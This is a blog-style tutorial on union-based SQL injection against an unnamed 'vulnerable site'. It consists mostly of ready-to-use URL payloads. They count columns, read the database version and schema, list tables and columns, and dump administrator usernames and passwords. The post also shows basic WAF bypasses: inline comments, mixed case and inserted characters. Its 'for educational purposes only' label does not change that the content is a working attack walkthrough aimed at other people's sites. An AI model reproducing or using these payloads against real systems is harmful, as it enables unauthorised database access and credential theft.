Basic sql injection.
+ string injection (forcing an error)For educational purposes only.
What do we need?
1. This tutorial.
2. Notepad. Because, using a pen and paper would take to long.
3. A vulnerable site.
Lets start.
1. Check the site, if it is vulnerable.
Enter ' behind the link
Code:
http://www.[site].com/page.php?id=1
Code:
http://www.[site].com/page.php?id=1'
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''5''' at line 1http://www.[site].com/page.php?id=1+order+by+1--+- [no error]
http://www.[site].com/page.php?id=1+order+by+99--+- [!!error!!]
http://www.[site].com/page.php?id=1+order+by+2--+- [no error]
http://www.[site].com/page.php?id=1+order+by+3--+- [no error]
http://www.[site].com/page.php?id=1+order+by+4--+- [error]To check if we don't have to use a string injection.
If you do not get an error when u use order+by+99--+-
Then we wil need to force an error.
Code:
http://www.[site].com/page.php?id=1+order+by+1--+- [no error]
http://www.[site].com/page.php?id=1+order+by+99--+- [no error]
http://www.[site].com/page.php?id=1+order+by+2--+- [no error]
http://www.[site].com/page.php?id=1+order+by+3--+- [no error]
http://www.[site].com/page.php?id=1+order+by+4--+- [no error]Always place a ' behind the id number.
Code:
http://www.[site].com/page.php?id=1'+order+by+1--+- [no error]
http://www.[site].com/page.php?id=1'+order+by+99--+- [!!error!!]
http://www.[site].com/page.php?id=1'+order+by+2--+- [no error]
http://www.[site].com/page.php?id=1'+order+by+3--+- [no error]
http://www.[site].com/page.php?id=1'+order+by+4--+- [error]We know we have 3 columns now.
[attention]If, you force an error! Never forget to use the ' behind the id number.[attention]
3. Union Select.
Code:
http://www.[site].com/page.php?id=1+union+select+1,2,3--+-Lets say, i see a big 2 in the middle of my site.
That means we have a vulnerable column.
We wil check version now.
Code:
http://www.[site].com/page.php?id=1+union+select+1,version(),3--+-
Code:
http://www.[site].com/page.php?id=1+union+select+1,@@version,3--+-We always want it to be 5.x.x or more!
Not lower then 5 if it is give up.
Lets say mine is: 5.0.92 - community
That means im readdy to roll.
4. Select database name:
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(database()),3--+-
Code:
http://www.[site].com/page.php?id=1+union+select+1,database(),3--+-do this:
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(schema_name),3+from+information_schema.schemata--+-This line asks the database which name it has.
The group_concat is a line we use to select annything we need.
5. Select table names:
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--+-If we want to find all tables you could do this manually using concat() and a limit.
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()+limit+0,1--+-Now you should have a list whit alot of names in there.
we select what we need.
Lets check for:
User"s", admin"s"
administrator"s", member"s"
tbladmin"s",tblmember"s"
tbluser"s",tbladministrator"s"
tbl_admins, ..
Lets say i have a administrator table.
6. Select column names:
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name="administrator"--+-if you do not see all columns.
If you get an error "DO NOT BE SCARED" it is not lost.
Its a hex: http://www.swingnote.com/tools/texttohex.php
Place the table name my case: administrator where it says:
Say hello to my little friend!
Translate: 61646d696e6973747261746f72 (administrator)
this is my hex.
How to ad it to a link. Wel, where u now have ble_name="administrator"--+-
At the end of your link. We need to change to this. ble_name=0x--+-
And place the hex behind the 0x.
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f72--+-Now you should see alot of names again. Look for username and password or email/password or name/pass whatever relates.
Mines are user and pass.
How do we select these. Not that hard at all.
We use the group_concat(user,0x3a,pass) 0x3a is nessesairy it means colon.
At the end: +from+db_1.administrator
The db_1 is the database we searched at start.
And, you do not need to use a hex now!
As following:
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(user,0x3a,pass),3+from+db_1.administrator--+-7. WAF bypassing. (basics)
When you have an error using the union select statement.
It is most likely because the admins made an attempt to secure against sqli.
Those admins fail...
So we have to make sure we can actually use the union statement.
to get what we need. a basic example: /*!union*/+/*!select*/
the /*! */ is bypassing the WAF because they only ignored union+select.
Code:
http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,2,3--+-There are many ways to bypass WAF.
example: un>ion+sel>ect
or: UnIoN+SeLeCt
Now we bypassed it? we still need information from the columns.
Code:
http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,CoNcAt(version()),3--+-Same for database.
Now we need tables.
Code:
http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,GrOuP_CoNcAt(/*!table_name*/),3+FrOm+/*!information_schema*/.TaBlEs+WhErE+/*!table_schema*/=database()--+-I wil not be teaching you how to decrypt those passwords.
Do not copy & paste. Type anything you see in the url.
You will learn alot faster! And, your mind will be 100% focused on the SQLi.
No comments:
Post a Comment